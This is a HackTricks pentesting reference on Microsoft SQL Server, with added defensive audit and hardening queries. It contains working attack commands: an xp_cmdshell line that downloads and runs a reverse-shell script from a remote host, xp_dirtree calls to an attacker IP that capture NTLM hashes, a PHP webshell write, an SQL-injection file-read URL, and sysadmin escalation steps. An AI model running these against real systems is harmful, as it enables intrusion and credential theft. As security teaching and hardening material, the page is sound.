# 1433 - Pentesting MSSQL - Microsoft SQL Server
☁️ HackTricks Cloud ☁️ - 🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
- Do you work in a cybersecurity company? Do you want to see your company advertised in HackTricks? Or do you want access to the latest version of PEASS or download HackTricks in PDF? Check the SUBSCRIPTION PLANS!
- Discover The PEASS Family, our collection of exclusive NFTs
- Get the official PEASS & HackTricks swag
- Join the 💬 Discord group or the telegram group or follow me on Twitter 🐦 @carlospolopm.
- Share your hacking tricks by submitting PRs to the hacktricks repo and hacktricks-cloud repo.
Find the most important vulnerabilities so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. Try it free today.
{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
## Basic Information
Microsoft SQL Server is a relational database management system developed by Microsoft. As a database server, it is a software product with the primary function of storing and retrieving data as requested by other software applications, which may run either on the same computer or on another computer across a network (including the Internet).
From wikipedia.
**Default port:** 1433
```
1433/tcp open  ms-sql-s  Microsoft SQL Server 2017 14.00.1000.00; RTM
```
### Default MS-SQL System Tables
- **master Database**: Records all the system-level information for an instance of SQL Server.
- **msdb Database**: Is used by SQL Server Agent for scheduling alerts and jobs.
- **model Database**: Is used as the template for all databases created on the instance of SQL Server. Modifications made to the model database, such as database size, collation, recovery model, and other database options, are applied to any databases created afterward.
- **Resource Database**: Is a read-only database that contains system objects that are included with SQL Server. System objects are physically persisted in the Resource database, but they logically appear in the sys schema of every database.
- **tempdb Database**: Is a work-space for holding temporary objects or intermediate result sets.
## Enumeration
### Automatic Enumeration
If you don't know anything about the service:
```bash
nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 <IP>
msf> use auxiliary/scanner/mssql/mssql_ping
```
{% hint style="info" %} If you don't have credentials you can try to guess them. You can use nmap or metasploit. Be careful: you can lock accounts out if you fail to log in several times using an existing username. {% endhint %}
### Metasploit (needs credentials)
```bash
#Set USERNAME, RHOSTS and PASSWORD
#Set DOMAIN and USE_WINDOWS_AUTHENT if domain is used
#Steal NTLM
msf> use auxiliary/admin/mssql/mssql_ntlm_stealer #Steal NTLM hash, before executing run Responder
#Info gathering
msf> use admin/mssql/mssql_enum #Security checks
msf> use admin/mssql/mssql_enum_domain_accounts
msf> use admin/mssql/mssql_enum_sql_logins
msf> use auxiliary/admin/mssql/mssql_findandsampledata
msf> use auxiliary/scanner/mssql/mssql_hashdump
msf> use auxiliary/scanner/mssql/mssql_schemadump
#Search for interesting data
msf> use auxiliary/admin/mssql/mssql_findandsampledata
msf> use auxiliary/admin/mssql/mssql_idf
#Privesc
msf> use exploit/windows/mssql/mssql_linkcrawler
msf> use admin/mssql/mssql_escalate_execute_as #If the user has IMPERSONATION privilege, this will try to escalate
msf> use admin/mssql/mssql_escalate_dbowner #Escalate from db_owner to sysadmin
#Code execution
msf> use admin/mssql/mssql_exec #Execute commands
msf> use exploit/windows/mssql/mssql_payload #Uploads and executes a payload
#Add new admin user from meterpreter session
msf> use windows/manage/mssql_local_auth_bypass
```
### Brute force
### Manual Enumeration
#### Login
```bash
# Using Impacket mssqlclient.py
mssqlclient.py [-db volume] <DOMAIN>/<USERNAME>:<PASSWORD>@<IP>
## Recommended -windows-auth when you are going to use a domain. Use as domain the netBIOS name of the machine
mssqlclient.py [-db volume] -windows-auth <DOMAIN>/<USERNAME>:<PASSWORD>@<IP>
# Using sqsh
sqsh -S <IP> -U <Username> -P <Password> -D <Database>
## In case Windows Auth using "." as domain name for local user
sqsh -S <IP> -U .\\<Username> -P <Password> -D <Database>
## In sqsh you need to use GO after writing the query to send it
1> select 1;
2> go
```
#### Common Enumeration
##### Service Detection
To begin with, we need to identify if the target system is running Microsoft SQL Server. We can use various methods to achieve this.
One common method is to use a port scanning tool like Nmap to scan for open ports on the target system. By default, Microsoft SQL Server listens on TCP port 1433. If this port is open, it indicates that the system may be running Microsoft SQL Server.
Another method is to use banner grabbing to obtain information about the running services on the target system. This can be done using tools like Telnet or Netcat. By connecting to the target system on port 1433 and examining the banner response, we can determine if Microsoft SQL Server is running.
##### Version Detection
Once we have identified that the target system is running Microsoft SQL Server, the next step is to determine the version of the server. This information can be useful in identifying potential vulnerabilities and selecting appropriate exploitation techniques.
One way to determine the version is by querying the server using SQL statements. For example, we can execute the following query to retrieve the version information:
```sql
SELECT @@VERSION;
```
This query will return the version information of the Microsoft SQL Server.
Another method is to use tools like Nmap or Metasploit to perform version detection. These tools have built-in scripts and modules that can identify the version of Microsoft SQL Server running on the target system.
##### Enumeration of Databases
Once we have identified the version of Microsoft SQL Server, we can proceed with enumerating the databases hosted on the server. This step is important as it allows us to gather information about the structure and content of the databases, which can be useful in further exploitation.
There are several methods to enumerate databases in Microsoft SQL Server. One common method is to use SQL statements to query the server for a list of databases. For example, we can execute the following query to retrieve the names of all databases:
```sql
SELECT name FROM sys.databases;
```
This query will return the names of all databases hosted on the server.
Another method is to use tools like Nmap or Metasploit, which have built-in scripts and modules for enumerating databases in Microsoft SQL Server.
##### Enumeration of Tables and Columns
Once we have identified the databases hosted on the server, the next step is to enumerate the tables and columns within each database. This step is crucial as it allows us to identify sensitive data and potential targets for further exploitation.
To enumerate tables and columns, we can use SQL statements to query the server. For example, we can execute the following query to retrieve the names of all tables within a specific database:
```sql
SELECT name FROM sys.tables;
```
This query will return the names of all tables within the specified database.
Similarly, we can execute SQL statements to retrieve the names of columns within a specific table. For example, we can execute the following query to retrieve the names of all columns within a table:
```sql
SELECT name FROM sys.columns WHERE object_id = OBJECT_ID('table_name');
```
This query will return the names of all columns within the specified table.
There are also tools like Nmap or Metasploit that have built-in scripts and modules for enumerating tables and columns in Microsoft SQL Server.
##### Enumeration of Users and Privileges
Another important aspect of enumeration is to identify the users and their privileges within the Microsoft SQL Server. This information can help us in understanding the access levels and potential targets for privilege escalation.
To enumerate users and their privileges, we can use SQL statements to query the server. For example, we can execute the following query to retrieve the names of all users within the server:
```sql
SELECT name FROM sys.syslogins;
```
This query will return the names of all users within the server.
Similarly, we can execute SQL statements to retrieve the privileges assigned to a specific user. For example, we can execute the following query to retrieve the privileges assigned to a user:
```sql
EXEC sp_helpuser 'username';
```
This query will return the privileges assigned to the specified user.
There are also tools like Nmap or Metasploit that have built-in scripts and modules for enumerating users and their privileges in Microsoft SQL Server.
```sql
# Get version
select @@version;
# Get user
select user_name();
# Get databases
SELECT name FROM master.dbo.sysdatabases;
# Use database
USE master
#Get table names
SELECT * FROM <databaseName>.INFORMATION_SCHEMA.TABLES;
#List Linked Servers
EXEC sp_linkedservers
SELECT * FROM sys.servers;
#List users
select sp.name as login, sp.type_desc as login_type, sl.password_hash, sp.create_date, sp.modify_date, case when sp.is_disabled = 1 then 'Disabled' else 'Enabled' end as status from sys.server_principals sp left join sys.sql_logins sl on sp.principal_id = sl.principal_id where sp.type not in ('G', 'R') order by sp.name;
#Create user with sysadmin privs
CREATE LOGIN hacker WITH PASSWORD = 'P@ssword123!'
EXEC sp_addsrvrolemember 'hacker', 'sysadmin'
```
#### Get Users
{% content-ref url="types-of-mssql-users.md" %} types-of-mssql-users.md {% endcontent-ref %}
```sql
# Get all the users and roles
select * from sys.database_principals;
## This query filters a bit the results
select name,
create_date,
modify_date,
type_desc as type,
authentication_type_desc as authentication_type,
sid
from sys.database_principals
where type not in ('A', 'R')
order by name;
## Both of these select all the users of the current database (not the server).
## Interesting when you cannot access the table sys.database_principals
EXEC sp_helpuser
SELECT * FROM sysusers
```
#### Get Permissions
Some introduction on MSSQL terminology:
- **Securable**: These are the resources to which the SQL Server Database Engine authorization system regulates access. Securables fall into three broader categories:
  - **Server** - for example databases, logins, endpoints, availability groups and server roles
  - **Database** - for example database roles, application roles, schemas, certificates, full-text catalogs, users
  - **Schema** - for example tables, views, procedures, functions, synonyms
- **Permission**: Every SQL Server securable has associated permissions like ALTER, CONTROL, CREATE that can be granted to a principal. Permissions are managed at the server level using logins and at the database level using users.
- **Principal**: The entity that receives permission to a securable is called a principal. The most common principals are logins and database users. Access to securables is controlled by granting or denying permissions, or by adding logins and users to roles which have access.
```sql
# Show all different securables names
SELECT distinct class_desc FROM sys.fn_builtin_permissions(DEFAULT);
# Show all possible permissions in MSSQL
SELECT * FROM sys.fn_builtin_permissions(DEFAULT);
# Get all my permissions over securable type SERVER
SELECT * FROM fn_my_permissions(NULL, 'SERVER');
# Get all my permissions over a database
USE <database>
SELECT * FROM fn_my_permissions(NULL, 'DATABASE');
# Get members of the role "sysadmin"
Use master
EXEC sp_helpsrvrolemember 'sysadmin';
# Get if the current user is sysadmin
SELECT IS_SRVROLEMEMBER('sysadmin');
# Get users that can run xp_cmdshell
Use master
EXEC sp_helprotect 'xp_cmdshell'
```
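The queries above answer "what can I do"; an auditor usually needs the inverse view of the securable / permission / principal model, "who holds what on this server". The following T-SQL is an added example (not HackTricks' own code) that joins `sys.server_permissions` to the principals on both ends of each row and appends server role memberships in the same shape. It assumes the reader has `VIEW ANY DEFINITION` (or is sysadmin); otherwise only the caller's own rows are returned.

```sql
-- Added example: server-level permission inventory (who -> what -> on which securable).
-- Assumes VIEW ANY DEFINITION or sysadmin so that other logins' rows are visible.
SELECT
    grantee.name        AS principal,
    grantee.type_desc   AS principal_type,      -- SQL_LOGIN, WINDOWS_LOGIN, SERVER_ROLE, ...
    p.class_desc        AS securable_class,
    CASE p.class
        WHEN 100 THEN @@SERVERNAME                    -- SERVER: the instance itself
        WHEN 101 THEN target.name                     -- SERVER_PRINCIPAL: a login or server role
        ELSE CONCAT(p.class_desc, N':', p.major_id)   -- ENDPOINT, AVAILABILITY GROUP, ...
    END                 AS securable,
    p.permission_name,
    p.state_desc        AS state                -- GRANT, GRANT_WITH_GRANT_OPTION or DENY
FROM sys.server_permissions AS p
JOIN sys.server_principals AS grantee
    ON p.grantee_principal_id = grantee.principal_id
LEFT JOIN sys.server_principals AS target
    ON p.class = 101 AND p.major_id = target.principal_id
WHERE grantee.name NOT LIKE '##%'              -- skip the internal certificate-based logins
UNION ALL
-- Role memberships are not permission rows, so they are listed separately in the same columns.
SELECT
    m.name, m.type_desc, 'SERVER_ROLE', r.name, 'MEMBER OF', 'GRANT'
FROM sys.server_role_members AS rm
JOIN sys.server_principals AS r ON rm.role_principal_id = r.principal_id
JOIN sys.server_principals AS m ON rm.member_principal_id = m.principal_id
ORDER BY principal, securable_class, permission_name;
```

Rows whose `principal` is `public` apply to every login, so they are the first ones to review; rows with `securable_class = SERVER_PRINCIPAL` and `permission_name = IMPERSONATE` are the ones the impersonation section later on this page is about.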
## Tricks
### Execute OS Commands
{% hint style="danger" %}
Note that in order to be able to execute commands it's not only necessary to have **xp_cmdshell** **enabled**, but also to have the **EXECUTE permission on the xp_cmdshell stored procedure**. You can get who (except sysadmins) can use **xp_cmdshell** with:
```sql
Use master
EXEC sp_helprotect 'xp_cmdshell'
```
{% endhint %}
```bash
# Username + Password + CMD command
crackmapexec mssql -d <Domain name> -u <username> -p <password> -x "whoami"
# Username + Hash + PS command
crackmapexec mssql -d <Domain name> -u <username> -H <HASH> -X '$PSVersionTable'
```
```sql
# Check if xp_cmdshell is enabled
SELECT * FROM sys.configurations WHERE name = 'xp_cmdshell';
# This turns on advanced options and is needed to configure xp_cmdshell
sp_configure 'show advanced options', '1'
RECONFIGURE
#This enables xp_cmdshell
sp_configure 'xp_cmdshell', '1'
RECONFIGURE
#One liner
sp_configure 'Show Advanced Options', 1; RECONFIGURE; sp_configure 'xp_cmdshell', 1; RECONFIGURE;
# Quickly check what the service account is via xp_cmdshell
EXEC master..xp_cmdshell 'whoami'
# Get Rev shell
EXEC xp_cmdshell 'echo IEX(New-Object Net.WebClient).DownloadString("http://10.10.14.13:8000/rev.ps1") | powershell -noprofile'
# Bypass blacklisted "EXEC xp_cmdshell"
'; DECLARE @x AS VARCHAR(100)='xp_cmdshell'; EXEC @x 'ping k7s3rpqn8ti91kvy0h44pre35ublza.burpcollaborator.net' --
```
### Steal NetNTLM hash / Relay attack
You should start an **SMB server** to capture the hash used in the authentication (`impacket-smbserver` or `responder` for example).
```sql
xp_dirtree '\\<attacker_IP>\any\thing'
exec master.dbo.xp_dirtree '\\<attacker_IP>\any\thing'
EXEC master..xp_subdirs '\\<attacker_IP>\anything\'
EXEC master..xp_fileexist '\\<attacker_IP>\anything\'
```
```bash
# Capture hash
sudo responder -I tun0
sudo impacket-smbserver share ./ -smb2support
msf> use auxiliary/admin/mssql/mssql_ntlm_stealer
```
{% hint style="warning" %} You can check who (apart from sysadmins) has permissions to run those MSSQL functions with:
```sql
Use master;
EXEC sp_helprotect 'xp_dirtree';
EXEC sp_helprotect 'xp_subdirs';
EXEC sp_helprotect 'xp_fileexist';
```
{% endhint %}
Using tools such as **responder** or **Inveigh** it's possible to **steal the NetNTLM hash**.
You can see how to use these tools in:
{% content-ref url="../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md" %} spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md {% endcontent-ref %}
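Both the "Execute OS Commands" hint and the warning above reduce to the same question: which non-sysadmin principals hold EXECUTE on an extended procedure that reaches the OS or the network. Running `sp_helprotect` once per procedure answers it one procedure at a time; the added example below (not HackTricks' code) answers it in one query over `master.sys.database_permissions`, and also covers the registry and OLE Automation procedures discussed later on this page. The procedure list is an assumption of the example; add whatever else the instance exposes. Remember that sysadmin members never appear here because they bypass permission checks entirely.

```sql
USE master;
GO
-- Added example: every explicit EXECUTE grant or deny on the extended/system procedures
-- this page discusses, with the database user in master that holds it and, where the user
-- is mapped to a login, that login. The procedure list is an assumption; extend as needed.
DECLARE @watched TABLE (proc_name sysname);
INSERT INTO @watched VALUES
    ('xp_cmdshell'), ('xp_dirtree'), ('xp_subdirs'), ('xp_fileexist'),
    ('xp_regread'), ('xp_regwrite'), ('xp_instance_regread'), ('xp_instance_regwrite'),
    ('sp_OACreate'), ('sp_OAMethod');

SELECT
    o.name              AS procedure_name,
    dp.name             AS grantee,          -- 'public' means every login that can reach master
    dp.type_desc        AS grantee_type,
    perm.state_desc     AS state,            -- GRANT or DENY
    sp.name             AS mapped_login      -- NULL for roles and unmapped users
FROM sys.all_objects AS o
JOIN @watched AS w
    ON o.name = w.proc_name COLLATE DATABASE_DEFAULT
JOIN sys.database_permissions AS perm
    ON perm.class = 1                        -- 1 = OBJECT_OR_COLUMN
   AND perm.major_id = o.object_id
   AND perm.permission_name = 'EXECUTE'
JOIN sys.database_principals AS dp
    ON perm.grantee_principal_id = dp.principal_id
LEFT JOIN sys.server_principals AS sp
    ON dp.sid = sp.sid
ORDER BY o.name, dp.name;

-- Remediation for an unwanted row (run as sysadmin), e.g. for xp_cmdshell:
--   REVOKE EXECUTE ON xp_cmdshell FROM [<grantee>];
--   EXEC sp_configure 'xp_cmdshell', 0; RECONFIGURE;
```

An empty result set is the expected state on a hardened instance: `xp_dirtree`, `xp_subdirs` and `xp_fileexist` are usually reachable only through `public` grants that someone added, so any `grantee = public` row on those three is worth removing, since it lets every login force the service account to authenticate to an arbitrary UNC path.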
### Abusing MSSQL trusted Links
Read this post to find more information about how to abuse this feature:
{% content-ref url="../../windows-hardening/active-directory-methodology/abusing-ad-mssql.md" %} abusing-ad-mssql.md {% endcontent-ref %}
### Write Files
To write files using **MSSQL** we **need to enable** **Ole Automation Procedures**, which requires admin privileges, and then execute some stored procedures to create the file:
```sql
# Enable Ole Automation Procedures
sp_configure 'show advanced options', 1
RECONFIGURE
sp_configure 'Ole Automation Procedures', 1
RECONFIGURE
# Create a File
DECLARE @OLE INT
DECLARE @FileID INT
EXECUTE sp_OACreate 'Scripting.FileSystemObject', @OLE OUT
EXECUTE sp_OAMethod @OLE, 'OpenTextFile', @FileID OUT, 'c:\inetpub\wwwroot\webshell.php', 8, 1
EXECUTE sp_OAMethod @FileID, 'WriteLine', Null, '<?php echo shell_exec($_GET["c"]);?>'
EXECUTE sp_OADestroy @FileID
EXECUTE sp_OADestroy @OLE
```
### Read files with OPENROWSET
By default, **MSSQL** allows reading any file in the operating system on which the account has read access. We can use the following SQL query:
```sql
SELECT * FROM OPENROWSET(BULK N'C:/Windows/System32/drivers/etc/hosts', SINGLE_CLOB) AS Contents
```
However, the **BULK** option requires the **ADMINISTER BULK OPERATIONS** or the **ADMINISTER DATABASE BULK OPERATIONS** permission.
```sql
# Check if you have it
SELECT * FROM fn_my_permissions(NULL, 'SERVER') WHERE permission_name='ADMINISTER BULK OPERATIONS' OR permission_name='ADMINISTER DATABASE BULK OPERATIONS';
```
**Error-based vector for SQLi:**
This technique involves exploiting SQL injection vulnerabilities by manipulating the application to generate error messages that reveal sensitive information about the database structure or data. By injecting malicious SQL statements, an attacker can force the application to produce error messages that provide valuable insights into the underlying database.
The error-based vector for SQL injection can be used to extract information such as table names, column names, and even data from the database. By carefully crafting SQL statements that intentionally cause errors, an attacker can gather valuable information that can be used for further exploitation.
It is important to note that error-based SQL injection attacks can be time-consuming and may require trial and error to identify the correct syntax and exploit the vulnerability successfully. However, they can be highly effective in extracting sensitive information from a vulnerable application.
To protect against error-based SQL injection attacks, it is crucial to implement proper input validation and parameterized queries in the application code. Regular security assessments and penetration testing can also help identify and mitigate SQL injection vulnerabilities before they can be exploited by attackers.
```
https://vuln.app/getItem?id=1+and+1=(select+x+from+OpenRowset(BULK+'C:\Windows\win.ini',SINGLE_CLOB)+R(x))--
```
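The paragraph above names parameterized queries as the fix but does not show what the difference looks like on the database side. The T-SQL below is an added example (not HackTricks' code) of the same `getItem?id=` endpoint implemented twice as a stored procedure: once by pasting the caller's text into a statement, which is what makes the `1 and 1=(select x from OpenRowset(...))` payload work, and once through `sp_executesql` with a typed parameter, where the text is never parsed as SQL. The `dbo.Items` table and both procedure names are assumptions of the example.

```sql
-- Added example: constructed table standing in for the application's data.
CREATE TABLE dbo.Items (id int PRIMARY KEY, name nvarchar(50));
INSERT INTO dbo.Items VALUES (1, N'widget'), (2, N'gadget');
GO

-- Vulnerable form: the id arrives as text and is concatenated into the statement, so
-- everything after the number becomes part of the query the engine executes.
CREATE PROCEDURE dbo.GetItem_Unsafe @id nvarchar(200) AS
BEGIN
    DECLARE @sql nvarchar(max) = N'SELECT id, name FROM dbo.Items WHERE id = ' + @id;
    EXEC (@sql);
END;
GO

-- Hardened form: the value is converted to the column's type up front and then bound as a
-- parameter of sp_executesql. The statement text is fixed; only the value varies.
CREATE PROCEDURE dbo.GetItem_Safe @id nvarchar(200) AS
BEGIN
    DECLARE @typed int = TRY_CONVERT(int, @id);   -- NULL when the text is not an integer
    IF @typed IS NULL
        THROW 50000, N'id must be an integer', 1;
    EXEC sp_executesql
        N'SELECT id, name FROM dbo.Items WHERE id = @id',
        N'@id int',
        @id = @typed;
END;
GO

-- Constructed inputs: the second is the shape of the payload shown above.
EXEC dbo.GetItem_Safe N'1';                      -- returns the widget row
EXEC dbo.GetItem_Safe N'1 and 1=(select 1)';     -- error 50000; no query is executed
```

The type check alone is not what makes the safe version safe; binding through `sp_executesql` is. It matters for columns that are legitimately text (a `name` filter, for example), where there is no numeric conversion to fall back on and the parameter binding is the only thing separating data from code.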
### RCE/Read files executing scripts (Python and R)
MSSQL could allow you to execute **scripts in Python and/or R**. This code will be executed by a **different user** than the one using **xp_cmdshell** to execute commands.
Example trying to execute an **'R'** *"Hello World!"* **not working**:
Example using the configured Python to perform several actions:
```sql
# Print the user being used (and execute commands)
EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(__import__("getpass").getuser())'
EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(__import__("os").system("whoami"))'
#Open and read a file
EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(open("C:\\inetpub\\wwwroot\\web.config", "r").read())'
#Multiline
EXECUTE sp_execute_external_script @language = N'Python', @script = N'
import sys
print(sys.version)
'
GO
```
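The "Execute OS Commands", "Write Files" and Python/R sections each depend on one server option being switched on (`xp_cmdshell`, `Ole Automation Procedures`, `external scripts enabled`), and each shows the `sp_configure` sequence to turn it on. The added example below (not HackTricks' code) reads the running and configured value of every such option from `sys.configurations` in one pass, so a reviewer can see the whole surface at once. The option list and the one-line risk notes are assumptions of this example; `value` is the configured value and `value_in_use` the one currently in effect, so a row where they differ means a change is pending `RECONFIGURE`.

```sql
-- Added example: surface-expanding server options and whether each is in effect.
-- The list and the notes are assumptions of this example; extend as needed.
DECLARE @risky TABLE (option_name nvarchar(35), why nvarchar(200));
INSERT INTO @risky VALUES
    (N'xp_cmdshell',               N'OS command execution under the service account'),
    (N'Ole Automation Procedures', N'sp_OACreate/sp_OAMethod: file system and COM access'),
    (N'external scripts enabled',  N'sp_execute_external_script: Python/R execution'),
    (N'clr enabled',               N'user-defined CLR assemblies'),
    (N'Ad Hoc Distributed Queries',N'OPENROWSET/OPENDATASOURCE against remote sources'),
    (N'remote admin connections',  N'DAC reachable over the network'),
    (N'show advanced options',     N'prerequisite for flipping the options above');

SELECT
    c.name,
    CAST(c.value AS int)        AS configured_value,   -- set by sp_configure
    CAST(c.value_in_use AS int) AS running_value,      -- after RECONFIGURE
    CASE WHEN CAST(c.value_in_use AS int) = 1 THEN 'ENABLED' ELSE 'disabled' END AS status,
    r.why
FROM sys.configurations AS c
JOIN @risky AS r
    ON c.name = r.option_name COLLATE DATABASE_DEFAULT
ORDER BY status, c.name;

-- Remediation for an option that should be off (sysadmin or ALTER SETTINGS required):
--   EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
--   EXEC sp_configure 'xp_cmdshell', 0;           RECONFIGURE;
--   EXEC sp_configure 'show advanced options', 0; RECONFIGURE;
```

`sys.configurations` is readable by any login, so this check needs no special rights; it is also a good candidate for a scheduled job whose output is compared against the previous run, because each of these options is toggled in exactly the way the sections above show.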
### Read Registry
Microsoft SQL Server provides **multiple extended stored procedures** that allow you to interact with not only the network but also the file system and even the Windows Registry:
| Regular | Instance-Aware |
|---|---|
| sys.xp_regread | sys.xp_instance_regread |
| sys.xp_regenumvalues | sys.xp_instance_regenumvalues |
| sys.xp_regenumkeys | sys.xp_instance_regenumkeys |
| sys.xp_regwrite | sys.xp_instance_regwrite |
| sys.xp_regdeletevalue | sys.xp_instance_regdeletevalue |
| sys.xp_regdeletekey | sys.xp_instance_regdeletekey |
| sys.xp_regaddmultistring | sys.xp_instance_regaddmultistring |
| sys.xp_regremovemultistring | sys.xp_instance_regremovemultistring |
```sql
# Example read registry
EXECUTE master.sys.xp_regread 'HKEY_LOCAL_MACHINE', 'Software\Microsoft\Microsoft SQL Server\MSSQL12.SQL2014\SQLServerAgent', 'WorkingDirectory';
# Example write and then read registry
EXECUTE master.sys.xp_instance_regwrite 'HKEY_LOCAL_MACHINE', 'Software\Microsoft\MSSQLSERVER\SQLServerAgent\MyNewKey', 'MyNewValue', 'REG_SZ', 'Now you see me!';
EXECUTE master.sys.xp_instance_regread 'HKEY_LOCAL_MACHINE', 'Software\Microsoft\MSSQLSERVER\SQLServerAgent\MyNewKey', 'MyNewValue';
# Example to check who can use these functions
Use master;
EXEC sp_helprotect 'xp_regread';
EXEC sp_helprotect 'xp_regwrite';
```
For **more examples** check out the original source.
### RCE with MSSQL User Defined Function - SQLHttp
It's possible to **load a .NET dll within MSSQL with custom functions**. This, however, **requires `dbo` access**, so you need a connection to the database **as `sa` or an Administrator role**.
Follow this link to see an example.
### Other ways for RCE
There are other methods to get command execution, such as adding extended stored procedures, CLR Assemblies, SQL Server Agent Jobs, and external scripts.
## MSSQL Privilege Escalation
### From db_owner to sysadmin
If a **regular user** is given the role **`db_owner`** over the **database owned by an admin** user (such as **`sa`**) and that database is configured as **`trustworthy`**, that user can abuse these privileges to **privesc**, because **stored procedures** created in there can **execute** as the owner (**admin**).
```sql
# Get owners of databases
SELECT suser_sname(owner_sid) FROM sys.databases
# Find trustworthy databases
SELECT a.name,b.is_trustworthy_on
FROM master..sysdatabases as a
INNER JOIN sys.databases as b
ON a.name=b.name;
# Get roles over the selected database (look for your username as db_owner)
USE <trustworthy_db>
SELECT rp.name as database_role, mp.name as database_user
from sys.database_role_members drm
join sys.database_principals rp on (drm.role_principal_id = rp.principal_id)
join sys.database_principals mp on (drm.member_principal_id = mp.principal_id)
# If you found you are db_owner of a trustworthy database, you can privesc:
--1. Create a stored procedure to add your user to sysadmin role
USE <trustworthy_db>
CREATE PROCEDURE sp_elevate_me
WITH EXECUTE AS OWNER
AS
EXEC sp_addsrvrolemember 'USERNAME','sysadmin'
--2. Execute stored procedure to get sysadmin role
USE <trustworthy_db>
EXEC sp_elevate_me
--3. Verify your user is a sysadmin
SELECT is_srvrolemember('sysadmin')
```
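The three conditions above (TRUSTWORTHY on, owner is a sysadmin, a non-dbo member of `db_owner`) are checked one database at a time in the queries shown. The added example below (not HackTricks' code) finds every database on the instance that meets all three at once, which is the list a DBA needs to close the path. It assumes `VIEW ANY DATABASE` plus `VIEW ANY DEFINITION` (or sysadmin), and it skips `msdb`, which ships with TRUSTWORTHY on by design.

```sql
-- Added example: databases where the db_owner -> sysadmin path is open, with the
-- db_owner members inside each. Assumes VIEW ANY DATABASE/DEFINITION or sysadmin.
DECLARE @db sysname, @owner sysname, @sql nvarchar(max);
DECLARE @findings TABLE (database_name sysname, owner_login sysname, db_owner_member sysname);

DECLARE dbs CURSOR LOCAL FAST_FORWARD FOR
    SELECT d.name, SUSER_SNAME(d.owner_sid)
    FROM sys.databases AS d
    WHERE d.is_trustworthy_on = 1
      AND d.state_desc = 'ONLINE'
      AND d.name <> 'msdb'                                   -- TRUSTWORTHY by design
      AND IS_SRVROLEMEMBER('sysadmin', SUSER_SNAME(d.owner_sid)) = 1;

OPEN dbs;
FETCH NEXT FROM dbs INTO @db, @owner;
WHILE @@FETCH_STATUS = 0
BEGIN
    -- USE inside the dynamic batch scopes the catalog views to that database;
    -- QUOTENAME guards against database names containing brackets or spaces.
    SET @sql = N'USE ' + QUOTENAME(@db) + N';
        SELECT DB_NAME(), @owner, m.name
        FROM sys.database_role_members AS rm
        JOIN sys.database_principals AS r ON rm.role_principal_id = r.principal_id
        JOIN sys.database_principals AS m ON rm.member_principal_id = m.principal_id
        WHERE r.name = N''db_owner'' AND m.name <> N''dbo'';';
    INSERT INTO @findings
        EXEC sp_executesql @sql, N'@owner sysname', @owner = @owner;
    FETCH NEXT FROM dbs INTO @db, @owner;
END;
CLOSE dbs;
DEALLOCATE dbs;

SELECT * FROM @findings ORDER BY database_name, db_owner_member;

-- Remediation, whichever is the smaller change for the application:
--   ALTER DATABASE [<db>] SET TRUSTWORTHY OFF;
--   ALTER AUTHORIZATION ON DATABASE::[<db>] TO [<low_privileged_login>];
```

Turning TRUSTWORTHY off is the complete fix; re-owning the database to a non-sysadmin login keeps the flag but caps what `EXECUTE AS OWNER` can reach, which is the same reason the attack needs an admin owner in the first place.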
You can use a **metasploit** module:
```bash
msf> use auxiliary/admin/mssql/mssql_escalate_dbowner
```
Or a **PS** script:
```powershell
# https://raw.githubusercontent.com/nullbind/Powershellery/master/Stable-ish/MSSQL/Invoke-SqlServer-Escalate-Dbowner.psm1
Import-Module .\Invoke-SqlServerDbElevateDbOwner.psm1
Invoke-SqlServerDbElevateDbOwner -SqlUser myappuser -SqlPass MyPassword! -SqlServerInstance 10.2.2.184
```
### Impersonation of other users
SQL Server has a special permission, named **`IMPERSONATE`**, that **allows the executing user to take on the permissions of another user** or login until the context is reset or the session ends.
```sql
# Find users you can impersonate
SELECT distinct b.name
FROM sys.server_permissions a
INNER JOIN sys.server_principals b
ON a.grantor_principal_id = b.principal_id
WHERE a.permission_name = 'IMPERSONATE'
# Check if the user "sa" or any other high privileged user is mentioned
# Impersonate sa user
EXECUTE AS LOGIN = 'sa'
SELECT SYSTEM_USER
SELECT IS_SRVROLEMEMBER('sysadmin')
```
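The query above joins on `grantor_principal_id`, which is the login that issued the GRANT; the login that can actually be impersonated is the securable itself, recorded in `major_id` when `class = 101` (SERVER_PRINCIPAL). The added example below (not HackTricks' code) pairs each grantee with its real target and flags targets that are members of sysadmin, which is the escalation the section describes. It assumes `VIEW ANY DEFINITION` or sysadmin; with less, only the caller's own grants are visible.

```sql
-- Added example: IMPERSONATE grants at server level, grantee -> target, with the targets
-- that are sysadmin flagged. Assumes VIEW ANY DEFINITION or sysadmin.
SELECT
    grantee.name                               AS grantee,
    target.name                                AS can_impersonate,
    IS_SRVROLEMEMBER('sysadmin', target.name)  AS target_is_sysadmin,  -- 1 = direct escalation path
    target.is_disabled                         AS target_disabled,     -- disabled logins can still be impersonated
    p.state_desc                               AS state
FROM sys.server_permissions AS p
JOIN sys.server_principals AS grantee ON p.grantee_principal_id = grantee.principal_id
JOIN sys.server_principals AS target  ON p.major_id = target.principal_id
WHERE p.class = 101                        -- SERVER_PRINCIPAL: the securable is a login
  AND p.permission_name = 'IMPERSONATE'
  AND p.state IN ('G', 'W')                -- GRANT / GRANT WITH GRANT OPTION; DENY rows excluded
ORDER BY target_is_sysadmin DESC, grantee.name;

-- Remediation:  REVOKE IMPERSONATE ON LOGIN::[<target>] FROM [<grantee>];
-- Detection:    a server audit on SERVER_PRINCIPAL_IMPERSONATION_GROUP records every
--               EXECUTE AS LOGIN, including the ones that switch to a sysadmin.
```

Database-level `IMPERSONATE` on users is a separate set of rows in each database's `sys.database_permissions` (also `class = 101`), so the same join applies there per database when checking the "access to other databases" case the hint below mentions.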
